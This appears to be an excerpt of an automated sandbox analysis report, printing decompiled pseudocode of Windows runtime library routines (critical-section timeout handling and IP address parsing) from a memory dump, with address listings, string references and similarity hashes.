                                                                                        0x01fa22b6
                                                                                        0x01fa228f
                                                                                        0x00000000
                                                                                        0x01fa226d
                                                                                        0x01f653cb
                                                                                        0x01f653ce
                                                                                        0x01f653d0
                                                                                        0x01f653d4
                                                                                        0x01f653d6
                                                                                        0x00000000
                                                                                        0x01f653d8
                                                                                        0x01f653e3
                                                                                        0x01f653ea
                                                                                        0x01f653ea
                                                                                        0x01f653d6
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FA22F4
                                                                                        Strings
                                                                                        • RTL: Resource at %p, xrefs: 01FA230B
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FA22FC
                                                                                        • RTL: Re-Waiting, xrefs: 01FA2328
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-871070163
                                                                                        • Opcode ID: 90d440d0590ba49444acd53a0111af4717423cb9513d8a6a6bfc576c9e94bf16
                                                                                        • Instruction ID: 093826d039938c9b3f654f053b27d9beccc7b94b184401521ca907924e5b5db0
                                                                                        • Opcode Fuzzy Hash: 90d440d0590ba49444acd53a0111af4717423cb9513d8a6a6bfc576c9e94bf16
                                                                                        • Instruction Fuzzy Hash: DC511871B00302ABEB15EB28CC81FAA739DAF55760F104219FD45DB251E677E84187A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F6EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 51%
                                                                                        			E01F6EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01F5DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x202793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01F416C0(_t39);
				} else {
					_t40 = E01F3F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01F83915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01F401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x202793c; // 0x0
								_push(_t85);
								_t44 = E01F41F28(_t71);
							} else {
								_t44 = E01F3F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01F83915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01FC2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01F6EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01F84FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01F93F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01F93F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20220c0;
								if(_t85 != 0x20220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01FC217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01F93F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                        0x01f6ec56
                                                                                        0x01f6ec56
                                                                                        0x01f6ec56
                                                                                        0x01f6ec5c
                                                                                        0x01f6ec64
                                                                                        0x01fa23e6
                                                                                        0x01fa23eb
                                                                                        0x01fa23eb
                                                                                        0x01f6ec6a
                                                                                        0x01f6ec6c
                                                                                        0x01f6ec6f
                                                                                        0x01fa23f3
                                                                                        0x01fa23f8
                                                                                        0x01fa23fa
                                                                                        0x01fa23fc
                                                                                        0x01f6ec75
                                                                                        0x01f6ec76
                                                                                        0x01f6ec76
                                                                                        0x01f6ec7b
                                                                                        0x01f6ec7c
                                                                                        0x01f6ec7e
                                                                                        0x01fa2406
                                                                                        0x01fa2407
                                                                                        0x01fa240c
                                                                                        0x01fa240d
                                                                                        0x01fa240d
                                                                                        0x01fa240d
                                                                                        0x01fa2414
                                                                                        0x01fa2417
                                                                                        0x01fa241e
                                                                                        0x01fa2435
                                                                                        0x01fa2438
                                                                                        0x01fa243c
                                                                                        0x01fa243f
                                                                                        0x01fa2442
                                                                                        0x01fa2443
                                                                                        0x01fa2446
                                                                                        0x01fa2449
                                                                                        0x01fa2453
                                                                                        0x01fa2455
                                                                                        0x01fa245b
                                                                                        0x01fa245b
                                                                                        0x01f6eb99
                                                                                        0x01f6eb99
                                                                                        0x01f6eb9c
                                                                                        0x01f6eb9d
                                                                                        0x01f6eb9f
                                                                                        0x01f6eba2
                                                                                        0x01fa2465
                                                                                        0x01fa246b
                                                                                        0x01fa246d
                                                                                        0x01f6eba8
                                                                                        0x01f6eba9
                                                                                        0x01f6eba9
                                                                                        0x01f6ebae
                                                                                        0x01f6ebb3
                                                                                        0x01f6ebb9
                                                                                        0x01f6ebbb
                                                                                        0x01fa2513
                                                                                        0x01fa2514
                                                                                        0x01fa2519
                                                                                        0x01fa251b
                                                                                        0x01f6ec2a
                                                                                        0x01f6ec2d
                                                                                        0x01f6ec33
                                                                                        0x01f6ec36
                                                                                        0x01f6ec3a
                                                                                        0x01f6ec3e
                                                                                        0x01f6ec40
                                                                                        0x01f6ec47
                                                                                        0x01f6ec47
                                                                                        0x01f6ec40
                                                                                        0x01f422c6
                                                                                        0x01f6ebc1
                                                                                        0x01f6ebc1
                                                                                        0x01f6ebc5
                                                                                        0x01f6ec9a
                                                                                        0x01f6ec9a
                                                                                        0x01f6ebd6
                                                                                        0x01f6ebd6
                                                                                        0x00000000
                                                                                        0x01f6ebbb
                                                                                        0x01fa2477
                                                                                        0x01fa247c
                                                                                        0x01fa2486
                                                                                        0x01fa248b
                                                                                        0x01fa2496
                                                                                        0x01fa249b
                                                                                        0x01fa249d
                                                                                        0x01fa24a0
                                                                                        0x01fa24a3
                                                                                        0x01fa24aa
                                                                                        0x01fa24aa
                                                                                        0x01fa24a5
                                                                                        0x01fa24a5
                                                                                        0x01fa24a5
                                                                                        0x01fa24ac
                                                                                        0x01fa24af
                                                                                        0x01fa24b0
                                                                                        0x01fa24b3
                                                                                        0x01fa24b9
                                                                                        0x01fa24ba
                                                                                        0x01fa24bb
                                                                                        0x01fa24c6
                                                                                        0x01fa24cb
                                                                                        0x01fa24cd
                                                                                        0x01fa24d0
                                                                                        0x01fa24d1
                                                                                        0x01fa24d4
                                                                                        0x01fa24d6
                                                                                        0x01fa24d9
                                                                                        0x01fa24d9
                                                                                        0x01fa24dc
                                                                                        0x01fa24df
                                                                                        0x01fa24e1
                                                                                        0x01fa24e7
                                                                                        0x01fa24e9
                                                                                        0x01fa24ec
                                                                                        0x01fa24ef
                                                                                        0x01fa24f2
                                                                                        0x01fa24f2
                                                                                        0x01fa24ef
                                                                                        0x01fa24e7
                                                                                        0x01fa24fa
                                                                                        0x01fa24ff
                                                                                        0x01fa2501
                                                                                        0x01fa2503
                                                                                        0x01fa2506
                                                                                        0x01fa250b
                                                                                        0x01f6eb8c
                                                                                        0x01f6eb93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f6eb93
                                                                                        0x00000000
                                                                                        0x01f6eb99
                                                                                        0x01f6ec85
                                                                                        0x01f6ec85
                                                                                        0x01f6ec85
                                                                                        0x00000000

                                                                                        Strings
                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FA248D
                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FA24BD
                                                                                        • RTL: Re-Waiting, xrefs: 01FA24FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                        • API String ID: 0-3177188983
                                                                                        • Opcode ID: 8d8154177a75b0abcd36199750449773c4d56d742c80e054d4ebe29af3951dc6
                                                                                        • Instruction ID: ec29a2505b0072d025b9b86c5cde454b36c8218cfc4c4267931793e826c61def
                                                                                        • Opcode Fuzzy Hash: 8d8154177a75b0abcd36199750449773c4d56d742c80e054d4ebe29af3951dc6
                                                                                        • Instruction Fuzzy Hash: 8941E8B1A00305EFDB24EB68CC84F6A7BB9EF84720F108605FA559B2C2D637E941C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01F7FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E01F7FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01F7EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01F7EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01F7685D(_t167, 4) == 0) {
								if(E01F7685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01F7685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01F7685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01F58980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01F4DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01F7EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01F7EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                        0x01f7fcd1
                                                                                        0x01f7fcd6
                                                                                        0x01f7fcd9
                                                                                        0x01f7fcdc
                                                                                        0x01f7fcdf
                                                                                        0x01f7fce2
                                                                                        0x01f7fce5
                                                                                        0x01f7fce8
                                                                                        0x01f7fceb
                                                                                        0x01f7fced
                                                                                        0x01f7fced
                                                                                        0x01f7fcf3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f7fcfc
                                                                                        0x01f7fcfe
                                                                                        0x01f7fdc1
                                                                                        0x01faecbd
                                                                                        0x00000000
                                                                                        0x01faeccc
                                                                                        0x01faeccc
                                                                                        0x01faecd2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faecdf
                                                                                        0x01faece0
                                                                                        0x01faece4
                                                                                        0x01faeceb
                                                                                        0x01faecee
                                                                                        0x01faeca8
                                                                                        0x01faeca8
                                                                                        0x01faecaa
                                                                                        0x01f7fd76
                                                                                        0x01f7fd79
                                                                                        0x01f7fdb4
                                                                                        0x01f7fdb5
                                                                                        0x01f7fdb6
                                                                                        0x00000000
                                                                                        0x01f7fdb6
                                                                                        0x01f7fd7e
                                                                                        0x01faecfc
                                                                                        0x01f7fe2f
                                                                                        0x00000000
                                                                                        0x01f7fe2f
                                                                                        0x01faed08
                                                                                        0x01faed0f
                                                                                        0x01faed17
                                                                                        0x01faed1b
                                                                                        0x00000000
                                                                                        0x01faed1b
                                                                                        0x01f7fd88
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f7fd94
                                                                                        0x01f7fd99
                                                                                        0x01f7fda1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f7fdb0
                                                                                        0x00000000
                                                                                        0x01f7fdb0
                                                                                        0x01faecbd
                                                                                        0x01f7fdc7
                                                                                        0x01f7fdcb
                                                                                        0x00000000
                                                                                        0x01f7fdd7
                                                                                        0x01f7fde3
                                                                                        0x01f7fe06
                                                                                        0x01f91fe7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f91fef
                                                                                        0x01f91ff0
                                                                                        0x01f91ff4
                                                                                        0x01f91ff7
                                                                                        0x01f91ffa
                                                                                        0x01f91ffd
                                                                                        0x01f92000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faecf1
                                                                                        0x00000000
                                                                                        0x01faecf1
                                                                                        0x00000000
                                                                                        0x01f7fe06
                                                                                        0x01f7fde8
                                                                                        0x01f7fdec
                                                                                        0x01f7fdef
                                                                                        0x01f7fdf2
                                                                                        0x00000000
                                                                                        0x01f7fdf2
                                                                                        0x01f7fdcb
                                                                                        0x01f7fd04
                                                                                        0x01f7fd05
                                                                                        0x01faec67
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faec6f
                                                                                        0x00000000
                                                                                        0x01faec6f
                                                                                        0x01f7fd13
                                                                                        0x01f7fd3c
                                                                                        0x01f7fd40
                                                                                        0x01faec75
                                                                                        0x01faec7a
                                                                                        0x00000000
                                                                                        0x01faec8a
                                                                                        0x01faec8a
                                                                                        0x01faec90
                                                                                        0x01faecb2
                                                                                        0x01f7fd73
                                                                                        0x01f7fd73
                                                                                        0x00000000
                                                                                        0x01f7fd73
                                                                                        0x01faec95
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faeca1
                                                                                        0x01faeca4
                                                                                        0x01faeca5
                                                                                        0x00000000
                                                                                        0x01faeca5
                                                                                        0x01faec7a
                                                                                        0x01f7fd4a
                                                                                        0x00000000
                                                                                        0x01f7fd6e
                                                                                        0x01f7fd6e
                                                                                        0x01f7fd71
                                                                                        0x00000000
                                                                                        0x01f7fd71
                                                                                        0x01f7fd4a
                                                                                        0x01f7fd21
                                                                                        0x01f8a3a1
                                                                                        0x00000000
                                                                                        0x01f8a3a1
                                                                                        0x01f7fd36
                                                                                        0x01f9200b
                                                                                        0x01f92012
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f92018
                                                                                        0x00000000
                                                                                        0x01f92018
                                                                                        0x00000000
                                                                                        0x01f7fd36
                                                                                        0x01f7fe0f
                                                                                        0x01f7fe16
                                                                                        0x01f8a3ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f8a3b3
                                                                                        0x01f8a3b3
                                                                                        0x01f7fe1f
                                                                                        0x01faed25
                                                                                        0x01faed86
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed91
                                                                                        0x01faed95
                                                                                        0x01faed95
                                                                                        0x01faed9a
                                                                                        0x01faedad
                                                                                        0x01faedb3
                                                                                        0x01faedba
                                                                                        0x01faedc4
                                                                                        0x01faedc9
                                                                                        0x00000000
                                                                                        0x01faedcc
                                                                                        0x01faed2a
                                                                                        0x01faed55
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed61
                                                                                        0x01faed66
                                                                                        0x01faed6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed7d
                                                                                        0x00000000
                                                                                        0x01faed7d
                                                                                        0x01faed30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01faed3c
                                                                                        0x01faed43
                                                                                        0x01faed4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID:
                                                                                        • API String ID: 3965848254-0
                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction ID: 37f6f1e71c389965e4ab177644edc48dc649b2d2d5c3195f0ef755f9363f023e
                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction Fuzzy Hash: 7D91BE71D0020AEFDF24DFA8C8456EEBBB0FF45714F60886BD521A7252E7325A81CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%